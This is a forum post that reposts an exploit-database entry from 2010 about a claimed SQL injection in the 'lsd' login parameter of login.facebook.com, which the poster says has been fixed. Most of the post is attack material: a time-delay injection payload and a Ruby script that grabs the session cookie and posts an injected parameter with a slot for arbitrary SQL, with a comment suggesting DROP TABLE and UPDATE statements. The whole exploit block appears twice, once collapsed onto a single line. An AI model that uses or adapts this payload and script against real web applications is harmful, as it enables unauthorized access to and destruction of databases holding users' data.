login.facebook.com SQL Injection Vulnerability

Hello !

My team partner have made an SQL Injection on login.facebook.com.
Now, this exploit isn't working because Facebook fix this vulnerability !

Code:

==============================================
login.facebook.com SQL Injection Vulnerability
==============================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# SQL Injection
# Path Sensitive : https://login.facebook.com/login.php?login_attempt=1
# Fault Find By Gsk2 | Whivack
# Code By Gsk2 | Whivack
# Variable POST Sensitive : lsd
# Thanks Team Guru-Security-Klan (www.gsk2.fr) and www.Inj3ct0r.com (Exploit Database) by r0073r
# Contact Me : whivackwdcompany@gmail.com (French)
# Useful Software : Ruby 1.8.6
# Download Ruby 1.8.6 : http://www.ruby-lang.org
# Demonstration Command : lsd=hUwMm%27%29%3Bwaitfor+delay+%270%3A0%3A15%27%3B--
# Result Command : <script type="text/**********"> ->
# var fbpd={"charset_test":"\u20ac,\u00b4,\u20ac,\u00b4,\u6c34,\u0414,\u0404","locale":"fr_FR","email":"gurusecurityklan@gsk2.fr","lsd":"hUwMm'); ->
# wait for delay '0:0:15';--"};#</script>

require 'net/http'
require 'net/https'

http = Net::HTTP.new('login.facebook.com', 443)
http.use_ssl = true
path = '/login.php'
resp, data = http.get(path, nil)
cookie = resp.response['set-cookie']

# DROP TABLE ... CREATE TABLE ... CREATE VIEW ... UDPATE ...
data = "lsd=%27[SQL Instruction]--"

headers = {
? 'Cookie' => cookie,
? 'Referer' => 'https://login.facebook.com/login.php',
? 'Content-Type' => 'application/x-www-form-urlencoded'
}
resp, data = http.post(path, data, headers)
puts 'Code = ' + resp.code


# Inj3ct0r.com [2010-06-24]

++Callo++

============================================== login.facebook.com SQL Injection Vulnerability ============================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # SQL Injection # Path Sensitive : https://login.facebook.com/login.php?login_attempt=1 # Fault Find By Gsk2 | Whivack # Code By Gsk2 | Whivack # Variable POST Sensitive : lsd # Thanks Team Guru-Security-Klan (www.gsk2.fr) and www.Inj3ct0r.com (Exploit Database) by r0073r # Contact Me : whivackwdcompany@gmail.com (French) # Useful Software : Ruby 1.8.6 # Download Ruby 1.8.6 : http://www.ruby-lang.org # Demonstration Command : lsd=hUwMm%27%29%3Bwaitfor+delay+%270%3A0%3A15%27%3B-- # Result Command : <script type="text/**********"> -> # var fbpd={"charset_test":"\u20ac,\u00b4,\u20ac,\u00b4,\u6c34,\u0414,\u0404","locale":"fr_FR","email":"gurusecurityklan@gsk2.fr","lsd":"hUwMm'); -> # wait for delay '0:0:15';--"};#</script> require 'net/http' require 'net/https' http = Net::HTTP.new('login.facebook.com', 443) http.use_ssl = true path = '/login.php' resp, data = http.get(path, nil) cookie = resp.response['set-cookie'] # DROP TABLE ... CREATE TABLE ... CREATE VIEW ... UDPATE ... data = "lsd=%27[SQL Instruction]--" headers = { ? 'Cookie' => cookie, ? 'Referer' => 'https://login.facebook.com/login.php', ? 'Content-Type' => 'application/x-www-form-urlencoded' } resp, data = http.post(path, data, headers) puts 'Code = ' + resp.code # Inj3ct0r.com [2010-06-24]

login.facebook.com SQL Injection Vulnerability

Post a Reply

Similar Threads

Tags for this Thread

login.facebook.com SQL Injection Vulnerability

Post a Reply

Similar Threads

Tags for this Thread